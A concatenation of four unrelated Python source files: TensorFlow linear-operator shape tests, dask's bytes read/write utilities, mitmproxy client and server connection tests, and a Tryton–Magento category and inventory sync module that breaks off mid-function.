  """A = L + UDU^H, D > 0, L > 0 ==> A > 0 and we can use a Cholesky."""
  _use_v = True
  _use_diag_update = True
  _is_diag_update_positive = True
class LinearOperatorLowRankUpdateBroadcastsShape(test.TestCase):
  """Test that the operator's shape is the broadcast of arguments."""
  def test_static_shape_broadcasts_up_from_operator_to_other_args(self):
    base_operator = linalg.LinearOperatorIdentity(num_rows=3)
    # u carries batch shape [2]; the operator must broadcast up to it.
    u = array_ops.ones(shape=[2, 3, 2])
    diag = array_ops.ones(shape=[2, 2])
    operator = linalg.LinearOperatorLowRankUpdate(base_operator, u, diag)
    # domain_dimension is 3
    self.assertAllEqual([2, 3, 3], operator.shape)
    self.assertAllEqual([2, 3, 3], self.evaluate(operator.to_dense()).shape)
  @test_util.run_deprecated_v1
  def test_dynamic_shape_broadcasts_up_from_operator_to_other_args(self):
    # All shapes fed at run time, so only the dynamic-shape path is covered.
    num_rows_ph = array_ops.placeholder(dtypes.int32)
    base_operator = linalg.LinearOperatorIdentity(num_rows=num_rows_ph)
    u_shape_ph = array_ops.placeholder(dtypes.int32)
    u = array_ops.ones(shape=u_shape_ph)
    operator = linalg.LinearOperatorLowRankUpdate(base_operator, u)
    feed_dict = {
        num_rows_ph: 3,
        u_shape_ph: [2, 3, 2],  # batch_shape = [2]
    }
    with self.cached_session():
      shape_tensor = operator.shape_tensor().eval(feed_dict=feed_dict)
      self.assertAllEqual([2, 3, 3], shape_tensor)
      dense = operator.to_dense().eval(feed_dict=feed_dict)
      self.assertAllEqual([2, 3, 3], dense.shape)
  def test_u_and_v_incompatible_batch_shape_raises(self):
    base_operator = linalg.LinearOperatorIdentity(num_rows=3, dtype=np.float64)
    # Batch dims 5 vs 4 cannot broadcast.
    u = rng.rand(5, 3, 2)
    v = rng.rand(4, 3, 2)
    with self.assertRaisesRegex(ValueError, "Incompatible shapes"):
      linalg.LinearOperatorLowRankUpdate(base_operator, u=u, v=v)
  def test_u_and_base_operator_incompatible_batch_shape_raises(self):
    base_operator = linalg.LinearOperatorIdentity(
        num_rows=3, batch_shape=[4], dtype=np.float64)
    u = rng.rand(5, 3, 2)
    with self.assertRaisesRegex(ValueError, "Incompatible shapes"):
      linalg.LinearOperatorLowRankUpdate(base_operator, u=u)
  def test_u_and_base_operator_incompatible_domain_dimension(self):
    base_operator = linalg.LinearOperatorIdentity(num_rows=3, dtype=np.float64)
    # u's second-to-last dim (4) must equal the operator's domain dim (3).
    u = rng.rand(5, 4, 2)
    with self.assertRaisesRegex(ValueError, "not compatible"):
      linalg.LinearOperatorLowRankUpdate(base_operator, u=u)
  def test_u_and_diag_incompatible_low_rank_raises(self):
    base_operator = linalg.LinearOperatorIdentity(num_rows=3, dtype=np.float64)
    u = rng.rand(5, 3, 2)
    diag = rng.rand(5, 4)  # Last dimension should be 2
    with self.assertRaisesRegex(ValueError, "not compatible"):
      linalg.LinearOperatorLowRankUpdate(base_operator, u=u, diag_update=diag)
  def test_diag_incompatible_batch_shape_raises(self):
    base_operator = linalg.LinearOperatorIdentity(num_rows=3, dtype=np.float64)
    u = rng.rand(5, 3, 2)
    diag = rng.rand(4, 2)  # First dimension should be 5
    with self.assertRaisesRegex(ValueError, "Incompatible shapes"):
      linalg.LinearOperatorLowRankUpdate(base_operator, u=u, diag_update=diag)
if __name__ == "__main__":
  # Register the generated operator tests on each concrete test class, then
  # hand control to the TensorFlow test runner.
  _test_classes = (
      LinearOperatorLowRankUpdatetestWithDiagUseCholesky,
      LinearOperatorLowRankUpdatetestWithDiagCannotUseCholesky,
      LinearOperatorLowRankUpdatetestNoDiagUseCholesky,
      LinearOperatorLowRankUpdatetestNoDiagCannotUseCholesky,
      LinearOperatorLowRankUpdatetestWithDiagNotSquare,
  )
  for _cls in _test_classes:
    linear_operator_test_util.add_tests(_cls)
  test.main()
| |
from __future__ import print_function, division, absolute_import
import io
import os
from toolz import merge
from warnings import warn
from .compression import seekable_files, files as compress_files
from .utils import SeekableFile
from ..compatibility import PY2, unicode
from ..base import tokenize
from ..delayed import delayed, Delayed, apply
from ..utils import (infer_storage_options, system_encoding,
build_name_function, infer_compression,
import_required)
# All delayed values built in this module are pure (same inputs -> same
# outputs), which lets dask deduplicate identical tasks.
delayed = delayed(pure=True)
# Global registration dictionaries for backend storage functions
# See docstrings to functions below for more information
# (protocol name -> backend implementation, e.g. 's3', 'hdfs')
_read_bytes = dict()
_open_files_write = dict()
_open_files = dict()
_open_text_files = dict()
def write_block_to_file(data, f, compression, encoding):
    """
    Write one block of data into an already-open backend file, then close it.

    Parameters
    ----------
    data : data to write
        Either str/bytes, or iterable producing those, or something file-like
        which can be read.
    f : file-like
        backend-dependent file-like object
    compression : string
        a key of `compress_files`
    encoding : string (None)
        if a string (e.g., 'ascii', 'utf8'), implies text mode, otherwise no
        encoding and binary mode.
    """
    backend_file = f
    f = SeekableFile(f)
    # When compressing, ``f`` becomes the compression wrapper; the wrapped
    # backend file must then be closed separately after the wrapper.
    compressed = False
    if compression:
        compressed = True
        f = compress_files[compression](f, mode='wb')
    try:
        if isinstance(data, (str, bytes)):
            if encoding:
                f.write(data.encode(encoding=encoding))
            else:
                f.write(data)
        elif isinstance(data, io.IOBase):
            # file-like: copy through in 64 kB chunks until EOF.
            # (Replaces the old ``out = '1'`` sentinel loop, which also
            # performed a pointless write of the final empty read.)
            while True:
                out = data.read(64 * 2 ** 10)
                if not out:
                    break
                if encoding:
                    f.write(out.encode(encoding=encoding))
                else:
                    f.write(out)
        else:
            # iterable, e.g., bag contents: newline-separate successive items
            first = True
            for d in data:
                if not first:
                    f.write(b'\n')
                first = False
                if encoding:
                    f.write(d.encode(encoding=encoding))
                else:
                    f.write(d)
    finally:
        f.close()
        if compressed:
            backend_file.close()
def write_bytes(data, urlpath, name_function=None, compression=None,
                encoding=None, **kwargs):
    """For a list of values which evaluate to bytes, produce delayed values
    which, when executed, result in writing to files.
    The path maybe a concrete directory, in which case it is interpreted
    as a directory, or a template for numbered output.
    The path may be preceded by a protocol, like ``s3://`` or ``hdfs://`` if
    those libraries are installed.
    Parameters
    ----------
    data: list of ``dask.Delayed`` objects or dask collection
        the data to be written
    urlpath: string
        Absolute or relative filepaths, URLs (may include protocols like
        ``s3://``); may be globstring (include `*`).
    name_function: function or None
        If using a globstring, this provides the conversion from part number
        to text to replace `*` with.
    compression: string or None
        String like 'gzip' or 'xz'.  Must support efficient random access.
    **kwargs: dict
        Extra options that make sense to a particular storage connection, e.g.
        host, port, username, password, etc.
    Examples
    --------
    >>> values = write_bytes(vals, 's3://bucket/part-*.csv')  # doctest: +SKIP
    Returns
    -------
    list of ``dask.Delayed`` objects
    """
    if isinstance(urlpath, (tuple, list, set)):
        # One explicit target path per delayed value.
        if len(data) != len(urlpath):
            # BUG FIX: the format args were previously passed as extra
            # ValueError arguments (logging-style) and the implicit string
            # concatenation was missing a space ("objectsmust").
            raise ValueError('Number of paths and number of delayed objects '
                             'must match (%s != %s)'
                             % (len(urlpath), len(data)))
        storage_options = infer_storage_options(urlpath[0],
                                                inherit_storage_options=kwargs)
        del storage_options['path']
        paths = [infer_storage_options(u, inherit_storage_options=kwargs)['path']
                 for u in urlpath]
    elif isinstance(urlpath, (str, unicode)):
        # Single path or globstring: expand to one path per delayed value.
        storage_options = infer_storage_options(urlpath,
                                                inherit_storage_options=kwargs)
        path = storage_options.pop('path')
        paths = _expand_paths(path, name_function, len(data))
    else:
        raise ValueError('URL spec must be string or sequence of strings')
    if compression == 'infer':
        compression = infer_compression(paths[0])
    if compression is not None and compression not in compress_files:
        raise ValueError("Compression type %s not supported" % compression)
    protocol = storage_options.pop('protocol')
    ensure_protocol(protocol)
    try:
        open_files_write = _open_files_write[protocol]
    except KeyError:
        raise NotImplementedError("Unknown protocol for writing %s (%s)" %
                                  (protocol, urlpath))
    # Deterministic task names so identical writes deduplicate.
    keys = ['write-block-%s' % tokenize(d.key, path, storage_options,
            compression, encoding) for (d, path) in zip(data, paths)]
    return [Delayed(key, dasks=[{key: (write_block_to_file, v.key,
                                       (apply, open_files_write, (p,),
                                        storage_options),
                                       compression, encoding),
                                 }, v.dask])
            for key, v, p in zip(keys, data, paths)]
def read_bytes(urlpath, delimiter=None, not_zero=False, blocksize=2**27,
               sample=True, compression=None, **kwargs):
    """ Convert path to a list of delayed values

    The path may be a filename like ``'2015-01-01.csv'`` or a globstring
    like ``'2015-*-*.csv'``, optionally preceded by a protocol
    (``s3://``, ``hdfs://``, ...) if the matching library is installed.

    If a delimiter is given, blocks are split cleanly so that each block
    starts directly after a delimiter and ends on one.

    Parameters
    ----------
    urlpath: string
        Absolute or relative filepath, URL (may include protocols like
        ``s3://``), or globstring pointing to data.
    delimiter: bytes
        An optional delimiter, like ``b'\\n'``, on which to split blocks
    not_zero: force seek of start-of-file delimiter, discarding header
    blocksize: int (=128MB)
        Chunk size
    compression: string or None
        String like 'gzip' or 'xz'.  Must support efficient random access.
    sample: bool, int
        Whether or not to return a sample from the first 10k bytes
    **kwargs: dict
        Extra options that make sense to a particular storage connection, e.g.
        host, port, username, password, etc.

    Examples
    --------
    >>> sample, blocks = read_bytes('2015-*-*.csv', delimiter=b'\\n')  # doctest: +SKIP
    >>> sample, blocks = read_bytes('s3://bucket/2015-*-*.csv', delimiter=b'\\n')  # doctest: +SKIP

    Returns
    -------
    10kB sample header and list of ``dask.Delayed`` objects or list of lists of
    delayed objects if ``fn`` is a globstring.
    """
    if compression is not None and compression not in compress_files:
        raise ValueError("Compression type %s not supported" % compression)
    storage_options = infer_storage_options(urlpath,
                                            inherit_storage_options=kwargs)
    protocol = storage_options.pop('protocol')
    ensure_protocol(protocol)
    # Dispatch to the backend registered for this protocol.
    try:
        backend_read_bytes = _read_bytes[protocol]
    except KeyError:
        raise NotImplementedError("Unknown protocol for reading %s (%s)" %
                                  (protocol, urlpath))
    path = storage_options.pop('path')
    return backend_read_bytes(path, delimiter=delimiter, not_zero=not_zero,
                              blocksize=blocksize, sample=sample,
                              compression=compression, **storage_options)
def open_files_by(open_files_backend, path, compression=None, **kwargs):
    """ Given open files backend and path return dask.delayed file-like objects

    Internal helper shared by :func:`open_files` and :func:`open_text_files`;
    see :func:`open_files` for the full documentation.

    Parameters
    ----------
    path: string
        Filepath or globstring
    compression: string
        Compression to use.  See ``dask.bytes.compression.files`` for options.
    **kwargs: dict
        Extra options that make sense to a particular storage connection,
        e.g. host, port, username, password, etc.

    Returns
    -------
    List of ``dask.delayed`` objects that compute to file-like objects
    """
    delayed_files = open_files_backend(path, **kwargs)
    if not compression:
        return delayed_files
    # Look up the decompression wrapper; merging the two registries lets
    # both seekable and non-seekable compression formats be used here.
    decompress = merge(seekable_files, compress_files)[compression]
    if PY2:
        # Python 2 file objects need wrapping before they seek reliably.
        delayed_files = [delayed(SeekableFile)(f) for f in delayed_files]
    return [delayed(decompress)(f) for f in delayed_files]
def open_files(urlpath, compression=None, **kwargs):
    """ Given path return dask.delayed file-like objects

    Parameters
    ----------
    urlpath: string
        Absolute or relative filepath, URL (may include protocols like
        ``s3://``), or globstring pointing to data.
    compression: string
        Compression to use.  See ``dask.bytes.compression.files`` for options.
    **kwargs: dict
        Extra options that make sense to a particular storage connection,
        e.g. host, port, username, password, etc.

    Examples
    --------
    >>> files = open_files('2015-*-*.csv')  # doctest: +SKIP
    >>> files = open_files('s3://bucket/2015-*-*.csv.gz', compression='gzip')  # doctest: +SKIP

    Returns
    -------
    List of ``dask.delayed`` objects that compute to file-like objects
    """
    if compression is not None and compression not in compress_files:
        raise ValueError("Compression type %s not supported" % compression)
    storage_options = infer_storage_options(urlpath,
                                            inherit_storage_options=kwargs)
    protocol = storage_options.pop('protocol')
    ensure_protocol(protocol)
    # Resolve the backend first so the failure mode is a clear error.
    if protocol not in _open_files:
        raise NotImplementedError("Unknown protocol %s (%s)" %
                                  (protocol, urlpath))
    backend = _open_files[protocol]
    return open_files_by(backend, storage_options.pop('path'),
                         compression=compression, **storage_options)
def _expand_paths(path, name_function, num):
    """Expand *path* into a list of *num* concrete output paths.

    ``path`` may be a globstring containing at most one ``'*'`` (replaced
    per partition by ``name_function(i)``), a plain directory (in which case
    a ``'*.part'`` pattern is appended), or an explicit list/tuple/set of
    exactly ``num`` paths which is returned unchanged.
    """
    if isinstance(path, (str, unicode)):
        if path.count('*') > 1:
            raise ValueError("Output path spec must contain at most one '*'.")
        if name_function is None:
            name_function = build_name_function(num - 1)

        if '*' not in path:
            # A bare directory: write numbered '*.part' files inside it.
            path = os.path.join(path, '*.part')

        # Warn when the generated names would not sort in partition order.
        formatted_names = [name_function(i) for i in range(num)]
        if formatted_names != sorted(formatted_names):
            warn("In order to preserve order between partitions "
                 "name_function must preserve the order of its input")

        paths = [path.replace('*', name_function(i))
                 for i in range(num)]
    elif isinstance(path, (tuple, list, set)):
        assert len(path) == num
        paths = path
    else:
        # Fixed: the previous message contained a stray '"' after "either"
        # and left the 'foo/' example quote unclosed.
        raise ValueError("""Path should be either
1. A list of paths -- ['foo.json', 'bar.json', ...]
2. A directory -- 'foo/'
3. A path with a * in it -- 'foo.*.json'""")
    return paths
def open_text_files(urlpath, encoding=system_encoding, errors='strict',
                    compression=None, **kwargs):
    """ Given path return dask.delayed file-like objects in text mode

    Parameters
    ----------
    urlpath: string
        Absolute or relative filepath, URL (may include protocols like
        ``s3://``), or globstring pointing to data.
    encoding: string
    errors: string
    compression: string
        Compression to use.  See ``dask.bytes.compression.files`` for options.
    **kwargs: dict
        Extra options that make sense to a particular storage connection,
        e.g. host, port, username, password, etc.

    Examples
    --------
    >>> files = open_text_files('2015-*-*.csv', encoding='utf-8')  # doctest: +SKIP
    >>> files = open_text_files('s3://bucket/2015-*-*.csv')  # doctest: +SKIP

    Returns
    -------
    List of ``dask.delayed`` objects that compute to text file-like objects
    """
    if compression is not None and compression not in compress_files:
        raise ValueError("Compression type %s not supported" % compression)
    storage_options = infer_storage_options(urlpath,
                                            inherit_storage_options=kwargs)
    path = storage_options.pop('path')
    protocol = storage_options.pop('protocol')
    ensure_protocol(protocol)

    # Prefer a native text-mode backend when one exists and no
    # decompression is required.
    if protocol in _open_text_files and compression is None:
        return _open_text_files[protocol](path,
                                          encoding=encoding,
                                          errors=errors,
                                          **storage_options)
    if protocol not in _open_files:
        raise NotImplementedError("Unknown protocol %s (%s)" %
                                  (protocol, urlpath))
    # Otherwise open binary files and wrap each one in a text decoder.
    binary_files = open_files_by(_open_files[protocol],
                                 path,
                                 compression=compression,
                                 **storage_options)
    if PY2:
        binary_files = [delayed(SeekableFile)(f) for f in binary_files]
    return [delayed(io.TextIOWrapper)(f, encoding=encoding, errors=errors)
            for f in binary_files]
def ensure_protocol(protocol):
    """Ensure *protocol* can be served by some registered backend.

    Returns silently for protocols that already have a registered backend;
    for ``s3`` and ``hdfs`` the optional libraries are import-checked
    (raising a helpful message when missing); anything else raises
    ``ValueError``.
    """
    registered = (protocol in _read_bytes) or (protocol in _open_files)
    if registered and protocol not in ('s3', 'hdfs'):
        return

    if protocol == 's3':
        import_required('s3fs',
                        "Need to install `s3fs` library for s3 support\n"
                        " conda install s3fs -c conda-forge\n"
                        " or\n"
                        " pip install s3fs")
    elif protocol == 'hdfs':
        msg = ("Need to install `distributed` and `hdfs3` "
               "for HDFS support\n"
               " conda install distributed hdfs3 -c conda-forge")
        import_required('distributed.hdfs', msg)
        import_required('hdfs3', msg)
    else:
        raise ValueError("Unknown protocol %s" % protocol)
| |
import socket
import os
import threading
import ssl
import OpenSSL
import pytest
from unittest import mock
from mitmproxy import connections
from mitmproxy import exceptions
from mitmproxy.net import tcp
from mitmproxy.net.http import http1
from mitmproxy.test import tflow
from mitmproxy.test import tutils
from .net import tservers
from pathod import test
class TestClientConnection:
    """Behavioral tests for ``connections.ClientConnection``."""

    def test_send(self):
        conn = tflow.tclient_conn()
        conn.send(b'foobar')
        conn.send([b'foo', b'bar'])
        # Only bytes (or lists of bytes) are accepted.
        for bad in ('string', ['string', 'not']):
            with pytest.raises(TypeError):
                conn.send(bad)
        assert conn.wfile.getvalue() == b'foobarfoobar'

    def test_repr(self):
        conn = tflow.tclient_conn()
        assert 'address:22' in repr(conn)
        assert 'ALPN' in repr(conn)
        assert 'TLS' not in repr(conn)

        conn.alpn_proto_negotiated = None
        conn.tls_established = True
        assert 'ALPN' not in repr(conn)
        assert 'TLS' in repr(conn)

    def test_tls_established_property(self):
        conn = tflow.tclient_conn()
        # ssl_established mirrors tls_established in both directions.
        for flag in (True, False):
            conn.tls_established = flag
            assert bool(conn.ssl_established) is flag
            assert bool(conn.tls_established) is flag

    def test_make_dummy(self):
        dummy = connections.ClientConnection.make_dummy(('foobar', 1234))
        assert dummy.address == ('foobar', 1234)

    def test_state(self):
        conn = tflow.tclient_conn()
        restored = connections.ClientConnection.from_state(conn.get_state())
        assert restored.get_state() == conn.get_state()

        other = tflow.tclient_conn()
        other.address = (other.address[0], 4242)
        assert not conn == other

        other.timestamp_start = 42
        conn.set_state(other.get_state())
        assert conn.timestamp_start == 42

        clone = conn.copy()
        assert clone.get_state() == conn.get_state()
class TestServerConnection:
    """Behavioral tests for ``connections.ServerConnection``."""

    def test_send(self):
        c = tflow.tserver_conn()
        c.send(b'foobar')
        c.send([b'foo', b'bar'])
        # Only bytes (or lists of bytes) are accepted.
        with pytest.raises(TypeError):
            c.send('string')
        with pytest.raises(TypeError):
            c.send(['string', 'not'])
        assert c.wfile.getvalue() == b'foobarfoobar'

    def test_repr(self):
        c = tflow.tserver_conn()

        c.sni = 'foobar'
        c.tls_established = True
        c.alpn_proto_negotiated = b'h2'
        assert 'address:22' in repr(c)
        assert 'ALPN' in repr(c)
        assert 'TLS: foobar' in repr(c)

        c.sni = None
        c.tls_established = True
        c.alpn_proto_negotiated = None
        assert 'ALPN' not in repr(c)
        assert 'TLS' in repr(c)

        c.sni = None
        c.tls_established = False
        assert 'TLS' not in repr(c)

    def test_tls_established_property(self):
        c = tflow.tserver_conn()
        c.tls_established = True
        assert c.ssl_established
        assert c.tls_established
        c.tls_established = False
        assert not c.ssl_established
        assert not c.tls_established

    def test_make_dummy(self):
        c = connections.ServerConnection.make_dummy(('foobar', 1234))
        assert c.address == ('foobar', 1234)

    def test_simple(self):
        d = test.Daemon()
        c = connections.ServerConnection((d.IFACE, d.port))
        c.connect()
        f = tflow.tflow()
        f.server_conn = c
        f.request.path = "/p/200:da"

        # use this protocol just to assemble - not for actual sending
        c.wfile.write(http1.assemble_request(f.request))
        c.wfile.flush()

        assert http1.read_response(c.rfile, f.request, 1000)
        assert d.last_log()

        c.finish()
        d.shutdown()

    def test_terminate_error(self):
        d = test.Daemon()
        c = connections.ServerConnection((d.IFACE, d.port))
        c.connect()
        c.connection = mock.Mock()
        c.connection.recv = mock.Mock(return_value=False)
        c.connection.flush = mock.Mock(side_effect=exceptions.TcpDisconnect)
        # finish() must swallow the disconnect rather than propagate it.
        c.finish()
        d.shutdown()

    def test_sni(self):
        c = connections.ServerConnection(('', 1234))
        # Fixed: pytest.raises takes ``match=``, not ``matches=``.  The old
        # keyword made pytest raise TypeError instead of checking that the
        # ValueError message matches.
        with pytest.raises(ValueError, match='sni must be str, not '):
            c.establish_ssl(None, b'foobar')
class TestClientConnectionTLS:
    """End-to-end TLS handshake test against a real socket pair."""

    @pytest.mark.parametrize("sni", [
        None,
        "example.com"
    ])
    def test_tls_with_sni(self, sni):
        # Bind a listening socket on an ephemeral port, then read back the
        # OS-assigned address so the client thread knows where to connect.
        address = ('127.0.0.1', 0)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.bind(address)
        sock.listen()
        address = sock.getsockname()

        def client_run():
            # Client side of the handshake, run in a background thread:
            # certificate verification disabled, SNI set per parametrize.
            ctx = ssl.create_default_context()
            ctx.check_hostname = False
            ctx.verify_mode = ssl.CERT_NONE
            s = socket.create_connection(address)
            s = ctx.wrap_socket(s, server_hostname=sni)
            s.send(b'foobar')
            s.shutdown(socket.SHUT_RDWR)
        threading.Thread(target=client_run).start()

        # Server side: accept the raw connection, then upgrade it to TLS
        # with the bundled test certificate/key.
        connection, client_address = sock.accept()
        c = connections.ClientConnection(connection, client_address, None)

        cert = tutils.test_data.path("mitmproxy/net/data/server.crt")
        key = OpenSSL.crypto.load_privatekey(
            OpenSSL.crypto.FILETYPE_PEM,
            open(tutils.test_data.path("mitmproxy/net/data/server.key"), "rb").read())
        c.convert_to_ssl(cert, key)

        # The handshake must complete, expose the client's SNI, and the
        # data sent before shutdown must be readable through the TLS layer.
        assert c.connected()
        assert c.sni == sni
        assert c.tls_established
        assert c.rfile.read(6) == b'foobar'
        c.finish()
class TestServerConnectionTLS(tservers.ServerTestBase):
    """TLS tests against the pathod-style test server base class."""
    # Tell ServerTestBase to run its server with TLS enabled.
    ssl = True

    class handler(tcp.BaseHandler):
        # Minimal handler: accept the handshake, then close immediately.
        def handle(self):
            self.finish()

    # clientcert may be absent, a directory of certs, or a single PEM file.
    # NOTE: these paths are resolved at import time of this module.
    @pytest.mark.parametrize("clientcert", [
        None,
        tutils.test_data.path("mitmproxy/data/clientcert"),
        os.path.join(tutils.test_data.path("mitmproxy/data/clientcert"), "client.pem"),
    ])
    def test_tls(self, clientcert):
        c = connections.ServerConnection(("127.0.0.1", self.port))
        c.connect()
        c.establish_ssl(clientcert, "foo.com")
        # Handshake must succeed and record the SNI we sent.
        assert c.connected()
        assert c.sni == "foo.com"
        assert c.tls_established
        c.close()
        c.finish()
| |
# -*- coding: UTF-8 -*-
import magento
from collections import defaultdict
import logbook
from trytond.model import ModelSQL, ModelView, fields
from trytond.transaction import Transaction
from trytond.pool import PoolMeta, Pool
from trytond.pyson import Eval
from decimal import Decimal
__all__ = [
'Category', 'MagentoInstanceCategory', 'Product',
'ProductSaleChannelListing',
'ProductPriceTier',
]
__metaclass__ = PoolMeta
log = logbook.Logger('magento', logbook.INFO)
def batch(iterable, n=1):
    """Yield consecutive slices of *iterable*, each at most *n* items long.

    *iterable* must support ``len()`` and slicing (list, tuple, string...).
    """
    total = len(iterable)
    for start in range(0, total, n):
        yield iterable[start:min(start + n, total)]
class Category:
    "Product Category"
    __name__ = "product.category"

    # Per-channel Magento mapping records for this category; one entry per
    # sale channel the category is known on.
    magento_ids = fields.One2Many(
        'magento.instance.product_category', 'category',
        'Magento IDs', readonly=True,
    )

    @classmethod
    def create_tree_using_magento_data(cls, category_tree):
        """
        Create the categories from the category tree

        :param category_tree: Category Tree from Magento
        """
        # Create the root
        root_category = cls.find_or_create_using_magento_data(
            category_tree
        )
        # Depth-first: create each child under the root, then recurse into
        # any grandchildren.
        for child in category_tree['children']:
            cls.find_or_create_using_magento_data(
                child, parent=root_category
            )
            if child['children']:
                cls.create_tree_using_magento_data(child)

    @classmethod
    def find_or_create_using_magento_data(
        cls, category_data, parent=None
    ):
        """
        Find or Create category using Magento Database

        :param category_data: Category Data from Magento
        :param parent: Browse record of Parent if present, else None
        :returns: Active record of category found/created
        """
        category = cls.find_using_magento_data(
            category_data
        )
        if not category:
            category = cls.create_using_magento_data(
                category_data, parent
            )
        return category

    @classmethod
    def find_or_create_using_magento_id(
        cls, magento_id, parent=None
    ):
        """
        Find or Create Category Using Magento ID of Category

        :param magento_id: Magento ID of the category
        :param parent: Browse record of Parent if present, else None
        :returns: Active record of category found/created
        """
        Channel = Pool().get('sale.channel')

        category = cls.find_using_magento_id(magento_id)
        if not category:
            channel = Channel.get_current_magento_channel()

            # Unknown locally: fetch the category details over the Magento
            # API of the current channel, then create it.
            with magento.Category(
                channel.magento_url, channel.magento_api_user,
                channel.magento_api_key
            ) as category_api:
                category_data = category_api.info(magento_id)

            category = cls.create_using_magento_data(
                category_data, parent
            )
        return category

    @classmethod
    def find_using_magento_data(cls, category_data):
        """
        Find category using Magento Data

        :param category_data: Category Data from Magento
        :returns: Active record of category found or None
        """
        MagentoCategory = Pool().get('magento.instance.product_category')

        # Mapping is scoped to the channel stored in the transaction
        # context ('current_channel' must be set by the caller).
        records = MagentoCategory.search([
            ('magento_id', '=', int(category_data['category_id'])),
            ('channel', '=', Transaction().context['current_channel'])
        ])
        # Legacy and/or conditional: the mapped category, or None.
        return records and records[0].category or None

    @classmethod
    def find_using_magento_id(cls, magento_id):
        """
        Find category using Magento ID of Category

        :param magento_id: Category ID from Magento
        :type magento_id: Integer
        :returns: Active record of Category Found or None
        """
        MagentoCategory = Pool().get('magento.instance.product_category')
        records = MagentoCategory.search([
            ('magento_id', '=', magento_id),
            ('channel', '=', Transaction().context['current_channel'])
        ])
        return records and records[0].category or None

    @classmethod
    def create_using_magento_data(cls, category_data, parent=None):
        """
        Create category using magento data

        :param category_data: Category Data from magento
        :param parent: Browse record of Parent if present, else None
        :returns: Active record of category created
        """
        # Create the category and its channel mapping in one nested write.
        category, = cls.create([{
            'name': category_data['name'],
            'parent': parent,
            'magento_ids': [('create', [{
                'magento_id': int(category_data['category_id']),
                'channel': Transaction().context['current_channel'],
            }])],
        }])
        return category
class MagentoInstanceCategory(ModelSQL, ModelView):
    """
    Magento Instance - Product Category Store

    This model keeps a record of a category's association with an Instance
    and the ID of the category on that channel
    """
    __name__ = "magento.instance.product_category"

    # ID of the category on the Magento side.
    magento_id = fields.Integer(
        'Magento ID', readonly=True, required=True, select=True
    )
    # NOTE(review): labelled "Magento Instance" but actually points at a
    # sale.channel record — confirm naming is intentional.
    channel = fields.Many2One(
        'sale.channel', 'Magento Instance', readonly=True,
        required=True, select=True
    )
    # Local Tryton category this Magento category maps to.
    category = fields.Many2One(
        'product.category', 'Product Category', readonly=True,
        required=True, select=True
    )

    @classmethod
    def __setup__(cls):
        '''
        Setup the class and define constraints
        '''
        super(MagentoInstanceCategory, cls).__setup__()
        # A given Magento category id may be mapped at most once per channel.
        cls._sql_constraints += [
            (
                'magento_id_instance_unique',
                'UNIQUE(magento_id, channel)',
                'Each category in an channel must be unique!'
            )
        ]
class ProductSaleChannelListing:
    "Product Sale Channel"
    __name__ = 'product.product.channel_listing'

    price_tiers = fields.One2Many(
        'product.price_tier', 'product_listing', 'Price Tiers'
    )
    # Magento product type of this listing; only shown for magento channels.
    magento_product_type = fields.Selection(
        [
            (None, ''),
            ('simple', 'Simple'),
            ('configurable', 'Configurable'),
            ('grouped', 'Grouped'),
            ('bundle', 'Bundle'),
            ('virtual', 'Virtual'),
            ('downloadable', 'Downloadable'),
        ], 'Magento Product Type', readonly=True, states={
            "invisible": Eval('channel_source') != 'magento'
        }, depends=['channel_source']
    )

    @classmethod
    def __setup__(cls):
        super(ProductSaleChannelListing, cls).__setup__()
        cls._error_messages.update({
            'multi_inventory_update_fail':
                "FaultCode: %s, FaultMessage: %s",
        })

    @classmethod
    def create_from(cls, channel, product_data):
        """
        Create a listing for the product from channel and data

        Non-magento channels are delegated to the parent implementation.
        """
        Product = Pool().get('product.product')

        if channel.source != 'magento':
            return super(ProductSaleChannelListing, cls).create_from(
                channel, product_data
            )
        # Unpacking raises ValueError when zero or multiple products match.
        try:
            product, = Product.search([
                ('code', '=', product_data['sku']),
            ])
        except ValueError:
            cls.raise_user_error("No product found for mapping")

        listing = cls(
            channel=channel,
            product=product,
            # Do not match by SKU: Magento mishandles purely numeric SKUs,
            # so the numeric product_id is used as the identifier instead.
            product_identifier=product_data['product_id'],
            magento_product_type=product_data['type'],
        )
        listing.save()
        return listing

    def export_inventory(self):
        """
        Export inventory of this listing

        Magento listings are funnelled through the bulk API.
        """
        if self.channel.source != 'magento':
            return super(ProductSaleChannelListing, self).export_inventory()

        return self.export_bulk_inventory([self])

    @classmethod
    def export_bulk_inventory(cls, listings):
        """
        Bulk export inventory to magento.

        Do not rely on the return value from this method.
        """
        SaleChannelListing = Pool().get('product.product.channel_listing')

        if not listings:
            # Nothing to update
            return

        # Split off non-magento listings and hand them to the generic
        # implementation.
        non_magento_listings = cls.search([
            ('id', 'in', map(int, listings)),
            ('channel.source', '!=', 'magento'),
        ])
        if non_magento_listings:
            super(ProductSaleChannelListing, cls).export_bulk_inventory(
                non_magento_listings
            )
        # NOTE(review): map()/filter() returning lists and iteritems()
        # below are Python 2 only idioms.
        magento_listings = filter(
            lambda l: l not in non_magento_listings, listings
        )

        log.info(
            "Fetching inventory of %d magento listings"
            % len(magento_listings)
        )

        # Group the per-product payloads by channel so one API session is
        # opened per channel.
        inventory_channel_map = defaultdict(list)
        for listing in magento_listings:
            channel = listing.channel
            product_data = {
                'qty': listing.quantity,
            }
            # TODO: Get this from availability used
            if listing.magento_product_type == 'simple':
                # Only send inventory for simple products
                product_data['is_in_stock'] = '1' \
                    if listing.quantity > 0 else '0'
            else:
                # configurable, bundle and everything else
                product_data['is_in_stock'] = '1'

            # group inventory xml by channel
            inventory_channel_map[channel].append([
                listing.product_identifier, product_data
            ])

        for channel, product_data_list in inventory_channel_map.iteritems():
            with magento.Inventory(
                    channel.magento_url,
                    channel.magento_api_user,
                    channel.magento_api_key) as inventory_api:
                # Push in batches of 50 products per API call.
                for product_data_batch in batch(product_data_list, 50):
                    log.info(
                        "Pushing inventory of %d products to magento"
                        % len(product_data_batch)
                    )
                    response = inventory_api.update_multi(product_data_batch)

                    # Magento bulk API will not raise Faults.
                    # Instead the response contains the faults as a dict
                    for i, result in enumerate(response):
                        if result is not True:
                            if result.get('isFault') is True and \
                                    result['faultCode'] == '101':
                                # Fault 101: product no longer exists on
                                # Magento — disable the local listing
                                # instead of aborting the whole batch.
                                listing, = SaleChannelListing.search([
                                    ('product_identifier', '=', product_data_batch[i][0]),  # noqa
                                    ('channel', '=', channel.id),
                                ])
                                listing.state = 'disabled'
                                listing.save()
                            else:
                                cls.raise_user_error(
                                    'multi_inventory_update_fail',
